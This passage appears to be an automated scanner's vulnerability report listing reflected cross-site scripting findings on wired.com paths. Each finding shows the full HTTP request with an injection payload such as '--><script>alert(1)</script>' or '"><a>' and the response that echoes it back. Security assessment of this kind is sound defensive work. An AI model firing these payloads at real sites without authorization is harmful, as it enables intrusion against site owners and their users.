Host:	http://www.wired.com
Path:	/ajax/widgets/related/content/blogPost/threatlevel_22564

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 205d9"><a>249a37450e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax205d9"><a>249a37450e2/widgets/related/content/blogPost/threatlevel_22564 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28674
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 13:03:06 GMT
Date: Wed, 12 Jan 2011 12:59:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax205d9"><a>249a37450e2 ss_widgets c_related">
...[SNIP]...

3.54. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/ajax/widgets/related/content/blogPost/threatlevel_22564

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26766"><a>ac7204c3476 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets26766"><a>ac7204c3476/related/content/blogPost/threatlevel_22564 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28674
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 13:03:11 GMT
Date: Wed, 12 Jan 2011 12:59:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets26766"><a>ac7204c3476 c_related">
...[SNIP]...

3.55. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/ajax/widgets/related/content/blogPost/threatlevel_22564

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 892c1"><a>b717fa44b47 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related892c1"><a>b717fa44b47/content/blogPost/threatlevel_22564 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28674
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Wed, 12 Jan 2011 13:03:00 GMT
Date: Wed, 12 Jan 2011 12:59:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related892c1"><a>b717fa44b47">
...[SNIP]...

3.56. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84fc9"><a>2661fde8d90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services84fc9"><a>2661fde8d90/dart/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28662
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:09:56 GMT
Date: Wed, 12 Jan 2011 05:05:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services84fc9"><a>2661fde8d90 ss_dart c_init">
...[SNIP]...

3.57. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wired.com
Path:	/services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 1ea2a--><script>alert(1)</script>e16b1ceae38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services1ea2a--><script>alert(1)</script>e16b1ceae38/dart/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28703
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:11:43 GMT
Date: Wed, 12 Jan 2011 05:07:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<script>alert(1)</script>e16b1ceae38/dart/init/threatlevel/kw=threatlevel
-->
...[SNIP]...

3.58. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wired.com
Path:	/services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload afcbe--><script>alert(1)</script>6fa95a9452b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/dartafcbe--><script>alert(1)</script>6fa95a9452b/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28703
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:09:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:09:39 GMT
Connection: close
Set-Cookie: JSESSIONID=cabZwTKl-2_Lv4oyrO41s; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<script>alert(1)</script>6fa95a9452b/init/threatlevel/kw=threatlevel
-->
...[SNIP]...

3.59. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94545"><a>aa0843de90d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/dart94545"><a>aa0843de90d/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28662
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:07:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:07:52 GMT
Connection: close
Set-Cookie: JSESSIONID=cabTzf5URbO2QfkB3N41s; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_dart94545"><a>aa0843de90d c_init">
...[SNIP]...

3.60. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e526"><a>ca37ef5da9c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/dart/init3e526"><a>ca37ef5da9c/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28662
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 05:19:47 GMT
Date: Wed, 12 Jan 2011 05:09:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_dart c_init3e526"><a>ca37ef5da9c">
...[SNIP]...

3.61. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wired.com
Path:	/services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 70510--><script>alert(1)</script>b4ecd010e4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/dart/init70510--><script>alert(1)</script>b4ecd010e4e/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28689
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 05:21:23 GMT
Date: Wed, 12 Jan 2011 05:11:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<script>alert(1)</script>b4ecd010e4e/threatlevel/kw=threatlevel
-->
...[SNIP]...

3.62. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wired.com
Path:	/services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6bfc8<script>alert(1)</script>41b5de530a5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/dart/init/threatlevel/kw6bfc8<script>alert(1)</script>41b5de530a5=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/javascript; charset=UTF-8
Content-Length: 249
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 05:21:56 GMT
Date: Wed, 12 Jan 2011 05:11:56 GMT
Connection: close

CN.dart.init({site:'wiredcom.dart', zone: 'threatlevel;', kws:[ "kw6bfc8<script>alert(1)</script>41b5de530a5=threatlevel"], charmap : {' ' : '+', '-' : '_'}});

3.63. http://www.wired.com/user/login [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e6e4"><a>5dd758f037d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user6e6e4"><a>5dd758f037d/login HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28617
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:12:23 GMT
Date: Wed, 12 Jan 2011 05:08:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user6e6e4"><a>5dd758f037d ss_login">
...[SNIP]...

3.64. http://www.wired.com/user/login [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/login

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c812"><a>5f7d13f6048 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/login1c812"><a>5f7d13f6048 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28617
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:13:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:13:01 GMT
Connection: close
Set-Cookie: JSESSIONID=cabM-CK_HDwqVgt0cP41s; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_login1c812"><a>5f7d13f6048">
...[SNIP]...

3.65. http://www.wired.com/user/logout [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/logout

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7759e"><a>e2aad4de1c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user7759e"><a>e2aad4de1c1/logout HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28619
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:12:28 GMT
Date: Wed, 12 Jan 2011 05:08:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user7759e"><a>e2aad4de1c1 ss_logout">
...[SNIP]...

3.66. http://www.wired.com/user/logout [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/logout

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e31"><a>04439d0209d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/logout68e31"><a>04439d0209d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28619
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:12:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:12:54 GMT
Connection: close
Set-Cookie: JSESSIONID=abcwtLdaCQT637ylbP41s; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_logout68e31"><a>04439d0209d">
...[SNIP]...

3.67. http://www.wired.com/user/registration [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/registration

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6859"><a>f18010a37e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /usere6859"><a>f18010a37e9/registration HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28631
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:13:12 GMT
Date: Wed, 12 Jan 2011 05:09:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_usere6859"><a>f18010a37e9 ss_registration">
...[SNIP]...

3.68. http://www.wired.com/user/registration [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/registration

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eb8b"><a>e52b868ec54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/registration6eb8b"><a>e52b868ec54 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28631
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:13:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:13:15 GMT
Connection: close
Set-Cookie: JSESSIONID=acbOZw9Mr3a9Y7nkgP41s; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_registration6eb8b"><a>e52b868ec54">
...[SNIP]...

3.69. http://www.wired.com/video/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/video/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d31f0"><a>5e756706c49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

